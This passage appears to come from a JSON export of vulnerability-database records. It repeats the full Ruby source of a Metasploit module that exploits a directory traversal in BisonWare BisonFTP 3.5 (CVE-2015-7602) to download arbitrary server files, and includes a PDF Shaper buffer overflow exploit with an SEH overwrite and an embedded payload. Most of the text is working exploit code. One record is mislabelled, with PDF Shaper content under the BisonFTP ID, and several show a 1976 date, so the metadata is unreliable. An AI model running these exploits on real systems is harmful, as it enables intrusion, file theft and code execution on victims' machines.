This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-09T03:33:03", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 96}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "5b127a73798ae08a29afbb5203e4504a", "type": "metasploit", "bulletinFamily": "exploit", "title": "PDF Shaper Buffer Overflow", "description": "PDF Shaper is prone to a security vulnerability when processing PDF files. The vulnerability appears when we use Convert PDF to Image and use a specially crafted PDF file. 
This module has been tested successfully on Win XP, Win 7, Win 8, Win 10.\n", "published": "2016-11-18T17:36:02", "modified": "2018-08-26T04:18:38", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-13T23:51:01", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-09T03:33:03"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-10-09T03:33:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/shaper_pdf_bof.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::PDF\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PDF Shaper Buffer Overflow',\n 'Description' => %q{\n PDF Shaper is prone to a security vulnerability when processing PDF files.\n The vulnerability appears when we use Convert PDF to Image and use a specially\n crafted PDF file. 
This module has been tested successfully on Win XP, Win 7,\n Win 8, Win 10.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'metacom27[at]gmail.com - twitter.com/m3tac0m', # POC\n 'metacom' # MSF Module\n ],\n 'References' =>\n [\n ['EDB', '37760']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process', # none/process/thread/seh\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'Space' => 2000,\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n ['<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>',\n {\n 'Ret' => 0x00402AC1, # PDFTools.exe\n 'Offset' => 433\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Oct 03 2015',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('FILENAME', [false, 'The file name.', 'msf.pdf'])\n ], self.class\n )\n end\n\n def exploit\n file_create(make_pdf)\n end\n\n def jpeg\n buffer = \"\\xFF\\xD8\\xFF\\xEE\\x00\\x0E\\x41\\x64\\x6F\\x62\\x65\\x00\\x64\\x80\\x00\\x00\"\n buffer << \"\\x00\\x02\\xFF\\xDB\\x00\\x84\\x00\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\\x02\"\n buffer << \"\\x02\\x03\\x02\\x02\\x02\\x03\\x04\\x03\\x03\\x03\\x03\\x04\\x05\\x04\\x04\\x04\"\n buffer << \"\\x04\\x04\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x05\\x07\\x08\\x08\\x08\"\n buffer << \"\\x07\\x05\\x09\\x0A\\x0A\\x0A\\x0A\\x09\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x01\\x03\\x02\\x02\\x03\\x03\\x03\\x07\\x05\"\n buffer << \"\\x05\\x07\\x0D\\x0A\\x09\\x0A\\x0D\\x0F\\x0D\\x0D\\x0D\\x0D\\x0F\\x0F\\x0C\\x0C\"\n buffer << \"\\x0C\\x0C\\x0C\\x0F\\x0F\\x0C\\x0C\\x0C\\x0C\\x0C\\x0C\\x0F\\x0C\\x0E\\x0E\\x0E\"\n buffer << \"\\x0E\\x0E\\x0C\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\"\n buffer << \"\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\xFF\\xC0\\x00\\x14\\x08\\x00\\x32\\x00\"\n buffer << \"\\xE6\\x04\\x01\\x11\\x00\\x02\\x11\\x01\\x03\\x11\\x01\\x04\\x11\\x00\\xFF\\xC4\"\n buffer << 
\"\\x01\\xA2\\x00\\x00\\x00\\x07\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x00\\x00\\x00\\x04\\x05\\x03\\x02\\x06\\x01\\x00\\x07\\x08\\x09\\x0A\\x0B\\x01\"\n buffer << \"\\x54\\x02\\x02\\x03\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n buffer << \"\\x01\\x00\\x02\\x03\\x04\\x05\\x06\\x07\"\n buffer << rand_text(target['Offset']) # junk\n buffer << generate_seh_record(target.ret)\n buffer << payload.encoded\n buffer << rand_text(2388 - payload.encoded.length)\n buffer\n end\n\n def make_pdf\n @pdf << header\n add_object(1, \"<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>\")\n add_object(2, \"<</Type/Outlines>>\")\n add_object(3, \"<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>\")\n add_object(4, \"[/PDF/Text/ImageC]\")\n add_object(5, \"<</Type/Page/Parent 3 0 R/Contents 6 0 R>>\")\n stream_1 = \"stream\" << eol\n stream_1 << \"0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q\" << eol\n stream_1 << \"endstream\" << eol\n add_object(6, \"<</Length 91>>#{stream_1}\")\n stream = \"<<\" << eol\n stream << \"/Width 230\" << eol\n stream << \"/BitsPerComponent 8\" << eol\n stream << \"/Name /X\" << eol\n stream << \"/Height 50\" << eol\n stream << \"/Intent /RelativeColorimetric\" << eol\n stream << \"/Subtype /Image\" << eol\n stream << \"/Filter /DCTDecode\" << eol\n stream << \"/Length #{jpeg.length}\" << eol\n stream << \"/ColorSpace /DeviceCMYK\" << eol\n stream << \"/Type /XObject\" << eol\n stream << \">>\"\n stream << \"stream\" << eol\n stream << jpeg << eol\n stream << \"endstream\" << eol\n add_object(7, stream)\n finish_pdf\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-13T23:51:01", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 97}, {"bulletin": {"id": 
"MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-14T01:35:28", "history": [], "viewCount": 52, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-14T01:35:28"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-14T01:35:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-14T01:35:28", "differentElements": ["modified", "published"], "edition": 98}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6ca196d549fd238df143ba70fad1099a", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-15T03:35:46", "history": [], "viewCount": 52, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-15T03:35:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-15T03:35:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-15T03:35:46", "differentElements": ["modified", "published"], "edition": 99}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-15T05:35:01", "history": [], "viewCount": 80, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-15T05:35:01"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-15T05:35:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-15T05:35:01", "differentElements": ["modified", "published"], "edition": 100}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6ca196d549fd238df143ba70fad1099a", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-22T01:36:35", "history": [], "viewCount": 80, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-22T01:36:35"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-22T01:36:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-22T01:36:35", "differentElements": ["modified", "published"], "edition": 101}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-10-22T03:44:49", "history": [], "viewCount": 85, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-10-22T03:44:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-10-22T03:44:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def 